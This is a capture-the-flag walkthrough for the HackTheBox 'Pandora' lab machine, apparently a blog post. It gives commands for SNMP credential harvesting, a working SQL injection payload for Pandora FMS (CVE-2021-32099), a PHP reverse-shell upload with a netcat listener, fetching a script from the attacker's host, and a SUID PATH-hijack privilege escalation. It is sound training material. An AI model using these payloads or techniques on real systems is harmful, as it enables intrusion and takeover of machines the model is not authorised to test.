CTF Challenges

Pandora HackTheBox Walkthrough

Summary

Pandora is a Linux machine and is considered an easy box by the hack the box but indeed it is not. With this box, we will need to perform another port scan instead of being relied on only TCP ports results. Then we will dig into SNMP protocol and find out very interesting information for us which will lead us to an initial foothold to the target machine. Then we will need to perform Horizontal privilege escalation and local port forward to enumerate service running on the target’s internal port. Then we will exploit the admin console which is vulnerable to SQL injection and upload a malicious file to get a reverse shell as a different user. In the post-exploitation phase, we will abuse the SUID binary using path hijacking technique.

Table of Content

Initial Access

  • TCP Port Scan
  • Enumeration
  • UDP Port Scan
  • SNMP Enumeration
  • User Shell as Daniel

Horizontal Privilege Escalation

  • Enumeration
  • Port Forwarding
  • CVE-2021-32099 SQL injection Exploitation
  • File Upload
  • User Flag

Privilege Escalation

  • SSH Key Generate
  • SUID Path hijack
  • Root Flag

Let’s exploit it step by step.

Initial Access

We are going to start the assessment with the TCP/IP port scanning.

TCP Port Scan

Let’s start with the port scan. We are using nmap to find out which ports are open so we can begin our port and service analyse. Nmap is a popular port scanning tool come with Kali Linux. In order to perform port scan, we have used -sC and -sV flags.

Flags features:

-sC   : Scans with default NSE scripts

-sV   :  Attempts to determine the service version

Command used:

nmap -sC -sV 10.129.26.243

From the nmap scan, we have found there were only two ports open, which are port 80 and port 22. As usual HTTP service is running on port 80 and the SSH service is running on port 22. Http service is used for Webhosting and the SSH service is used for remote connection. SSH version is the latest and does not look vulnerable and the possible attack we can perform against the SSH service at this stage is bruteforce only which we might not need to. Instead of thinking about the SSH bruteforce let’s start enumerating port 80.

Enumeration

We begin enumeration by accessing port 80 over the browser. The webpage does not have many interesting things, but we can see the domain name is available there which is Panda.htb. Next thing we can analyse what this website is made for, and what it does. Remember every website is created for some purpose with this mindset we assumed this website is serving games and network monitoring solutions.

htttp://10.129.26.243

UDP Port Scan

Got stuck for some time as we did not get any lead to get a foothold into the target system, we decided to perform a UDP port scan. When we do a normal nmap scan, it only scans TCP ports but not UDP so many time UDP ports may lead us to interesting findings. After the completion of the UDP port scan, we found that SNMP port is open on its default port which is port 161. Now we can go for further enumeration against the SNMP port but let’s talk about SNMP first.

What is SNMP and what it is used for?

Simple Network Management Protocol (SNMP) is a networking protocol used for the monitoring and management of the network-connected end devices in the internet protocol networks. It is embedded in multiple local devices such as routers, switches, servers, firewalls, and wireless access points using IP addresses. It runs on UDP protocol and uses port 161 and 162 as its default port. 

nmap -sU 10.129.26.243

Flags features:

-sU: Scans UDP ports

SNMP Enumeration

 Once we found that the SNMP service is running and the port is open on 161, we are in the position to go for the further enumeration process. In order to enumerate SNMP service, we need to know what we are going to enumerate on that service which will give us important information that will be useful for future analysis and assessment. Whenever we come to enumerate SNMP, we need to focus on a couple of things such as Community Strings and versions. In most of cases, community strings is public and the version may be different in each case. There are three versions in the SNMP, which are V1, V2 and V3 which are differentiated by their features. In the table below we can see each version has different security features from weak to encrypted.

We will enumerate community strings and the version with snmp-check.

snmp-check 10.129.26.243

With snmp-check, we have found that SNMPv1 is used, and the community string is public. Now we are in a position to enumerate further based on the community strings and the version. For that, we will use snmpwalk.

snmpwalk -c public -v1 10.129.26.243

Snmpwalk has given an interesting finding here, if we scroll down, we will see there a username daniel and password HotelBabylon23 is there. From here, we can think about login in via SSH as SSH port is open and we can test with found credentials.

User Shell as Daniel

We have successfully logged in as Daniel and tried to retrieve our user flag but unfortunately, we do not have permission to get the user flag as it is belonging to user matt. To retrieve the user flag, we need to compromise matt account then only it is possible to retrieve the flag contents?

ssh daniel@10.129.26.243
cd /home
cd matt
ls
cat user.txt

Horizontal Privilege Escalation

Here we need to do a horizontal privilege escalation. There are two types of privilege escalations, one is vertical where we get the user shell and then just need to get root shell but, in our scenario, it does not apply, and we must go through a horizontal way where we need to compromise another user to escalate to root.

Enumeration

Let’s transfer linpeas and check what it brings to us. Linpeas is an automated script which is useful to find the privilege escalation vectors in the target system. In the below picture we transferred linpeas.sh in the target /tmp directory and gave execute permission with chmod 777 and simply executed.

cd /tmp
wget 10.10.14.3/linpeas.sh
chmod 777 linpeas.sh
./linpeas.sh

From the linpeas result, we noticed a SUID pandora_backup is there which is an uncommon system binary, so we decided to find out more about it. Owner of this file is root, but matt has execution permission. Also, the web is hosted on an internal server which is only accessible from the internal port which means we cannot access it directly from our Kali machine but if we manage to forward its local host port to our kali machine then we can access it. If we give a closer look at the picture above, pandora.panda.htb is running on port 80 which is hosted from /var/www/pandora. Additionally, we can also assume it by checking the config file in which is available in the /etc/apache2/sites-enabled directory.

Port Forwarding

As we know there is a service running on local port 80. We decided to use the local port forwarding technique here. It can be done from kali machine if we have valid credentials.

ssh -L 8084:localhost:80 -N -f -l daniel 10.129.26.243

Flags features:

-L   : Listening port on Kali

-N   : Do not execute any remote command

-f   : Run in the background

-l  : Username 

After local port forwarding, we can access the service which was running on the target internal port. An interesting finding came up and lead us to the pandora login console.

While enumerating the console we found a CMS with version is there on the right bottom side of the page: v7.0NG.742_FIX_PERL2020.

http://localhost:8084/pandora_console/

After a few searches on google, we found Pandora FMS 742 is vulnerable to SQL injection. Detail information about the vulnerability can be found below:

https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained

CVE-2021-32099 SQL Injection Exploitation

The blog had detailed information about the vulnerability but no POC or exploit code was available then we search for the CVE number so we can expand and filter our search on google to find out the exact resource that we are looking for. We found CVE-2021-32099 belongs to this vulnerability and found an exploit encoded POC in the Github.

Reference: https://github.com/ibnuuby/CVE-2021-32099

We decoded the URL and tested this payload against the target.

Decoded payload:

http://localhost:8084/pandora_console/include/chart_generator.php?session_id=a' UNION SELECT 'a',1,'id_usuario|s:5:"admin";' as data FROM tsessions_php WHERE '1'='1

File Upload

We successfully exploited the admin console and from here we can think about uploading a malicious file so we can get a reverse shell once it is executed. Whenever we come across the admin console, we see most of the time that admin has permission to upload file on CMS, with the same concept we upload a file by navigating admin tools then file manager.

There is an up-arrow tab on the right side of the file manager which will let us upload a malicious file.

Here we are going to upload a regular Pentest monkey’s PHP reverse shell which comes with the Kali and is available in the /usr/share/webshells/php directory named as php-reverse-shell.php. Next, we will copy this reverse shell to the to root directory and rename as shell.php.

cd /usr/share/webshells/php
cp php-reverse-shell.php /root/shell.php

Once we copied the reverse shell to the root directory then we need to make a minor modification in the shell.php. We need to provide our IP address and the listening port number which is 1234 in order to get reverse connection back to our machine.

Now we are in the position to upload our malicious file to the CMS.  We can select browse tab and upload our file from there and press Go. Our file is uploaded and saved in the /images directory.

User flag

After uploading the malicious file, we can execute by accessing /the images directory over the browser along with our file name which is shell.php. Before accessing our uploaded file, we need to set netcat listener in our Kali machine.

http://localhost:8084/pandora_console/images/shell.php
nc -lvp 1234

Once we set up the listener in our Kali machine, we can access the above URL to get the reverse connection back to our Kali machine. With reference above picture, we can see that we have successfully got a reverse shell as user matt. Now we can grab our user flag from the /home/matt/ directory.

Privilege Escalation

We found a SUID binary from the linpeas output but at that stage, we could not be able to exploit that as we had Daniel shell not matt shell and SUID was set for Matt with execute permission. Ltrace is pre-installed in the pandora box so we can use this tool to enumerate the pandora_backup file. From the out, we can see that the program is saving backup to the /root/.backup directory without providing full path of the binary. So here the possible attack is to hijack its binary path. In order to do the path hijacking let’s get a stable fully interactive shell so we can perform our attack without any shell issues.

SSH Key Generate

We will generate an SSH key in our kali and save it as pandora. Two keys will be generated one is public key and another is private key. We need to transfer the public key to the target system. To send the file to the target system we need to set up a python server in our Kali on port 80, it is not mandatory to use port 80 we can use any port as our wish.

ssh-keygen -f pandora
ls -la
python3 -m http.server 80

Next, we need to transfer the public key in the matt user home directory. If there is no .ssh directory, then we need to create one and place public key to .ssh directory then we need to change its name to authorized_keys and provide right permission to .ssh directory where keys are kept.

mkdir .ssh
cd .ssh
wget 10.10.14.3/pandora.pub
mv pandora.pub authorized_keys
cd ..
chmod +R 777 .ssh

Once we followed the above steps then we need to give chmod 600 permission to the private key which is stored in our Kali. Next, we will connect with the target system as matt using this private key. This part is a kind of maintaining persistence and gaining fully interactive shell as user matt. The main reason we are login in with the ssh key because we do not have user matt password and it can be very painful if we lose shell during the exploitation process.

SUID Path Hijack

Now we are in the position to abuse SUID tar binary. Let’s understand the methodology behind the attack. Whenever matt user executes the program pandora_backup then it will use tar command which has no binary path set so we will make a fake tar executable and put /bin/bash and set its binary path to our current path where our malicious tar executable is present.

cd /tmp
echo "/bin/bash" > tar
chmod 777 tar
export PATH=.:$PATH

Root Flag

Once path is set and if the matt executes the program, then it will execute tar from the path we have set, and a root shell will get spawn. Once root shell will spawn then we can grab our root flag from the /root directory.

/usr/bin/pandora_backup
cd /root
ls
cat root.txt

Conclusion:

This machine was fun and was a great source of learning, where we learned and explored so many things such as TCP port scan, UDP port scan, service enumeration, SNMP enumeration, port forwarding, SQL injection, malicious file upload, horizontal privilege escalation, ssh key generate, SUID path hijacking.

Thank you for giving your precious time to read this walkthrough. I hope you have enjoyed and learned something new today. Happy Hacking!

Author: Subhash Paudel is a Penetration Tester and a CTF player who has a keen interest in various technologies and love to explore more and more. Additionally, he is a technical writer at Hacking articles. Contact here: Linkedin